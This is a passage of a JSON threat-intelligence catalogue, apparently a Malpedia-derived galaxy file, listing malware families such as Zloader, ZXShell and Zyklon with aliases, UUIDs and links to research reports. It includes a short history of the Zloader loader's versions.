"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" ], "synonyms": [], "type": [] }, "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", "value": "Zezin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", "value": "ZhCat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "989330e9-52da-4489-888b-686429db3a45", "value": "ZhMimikatz" }, { "description": "This family describes the 
(initially small) loader, which downloads Zeus OpenSSL.\r\n\r\nIn June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (-> Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded.\r\nThe initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.\r\n\r\nPlease note that IBM X-Force decided to call win.zloader/win.zeus_openssl \"Zeus Sphinx\", after mentioning it as \"a new version of Zeus Sphinx\" in their initial post in August 2016. 
Malpedia thus lists the alias \"Zeus XSphinx\" for win.zeus_openssl - the X to refer to IBM X-Force.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", "https://www.fortinet.com/blog/threat-research/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users.html", "https://securityintelligence.com/around-the-world-with-zeus-sphinx-from-canada-to-australia-and-back/", "https://www.forcepoint.com/blog/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware", "https://securityintelligence.com/zeus-sphinx-pushes-empty-configuration-files-what-has-the-sphinx-got-cooking/" ], "synonyms": [ "DELoader", "Terdot" ], "type": [] }, "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", "value": "Zloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" ], "synonyms": [ "gresim" ], "type": [] }, "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", "value": "ZoxPNG" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", "https://github.com/smb01/zxshell", "https://blogs.cisco.com/security/talos/opening-zxshell", "https://blogs.rsa.com/cat-phishing/" ], "synonyms": [ "Sensocode" ], "type": [] }, "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", "value": "ZXShell" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "https://blog.talosintelligence.com/2017/05/modified-zyklon-and-plugins-from-india.html", "https://asert.arbornetworks.com/wp-content/uploads/2017/05/zyklon_season.pdf" ], "synonyms": [], "type": [] }, "uuid": 
"721e9af0-8a60-4b9e-9137-c23e86d75722", "value": "Zyklon" } ], "version": 1838 }